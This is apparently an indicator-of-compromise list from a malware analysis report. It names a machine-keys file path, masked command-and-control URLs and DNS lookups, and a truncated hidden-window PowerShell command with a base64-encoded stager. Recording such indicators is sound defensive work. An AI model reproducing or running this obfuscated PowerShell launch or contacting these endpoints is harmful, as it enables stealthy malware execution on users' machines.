Technical information
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\571a73d0ff85bc4b5b460655be1dc9e8_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://ww##.###storehosting.com/news.php
- http://ww##.###storehosting.com/login/process.php
- DNS ASK ww##.###storehosting.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAG8ATgBUAEEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAG8AbgAuAE0AQQBKAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAAUwA9AFsAcgBFAGYAXQAuAEEAcwBzAEUAbQBCAEwAWQAuAEcAZQB0AFQAWQ...' (with a hidden window)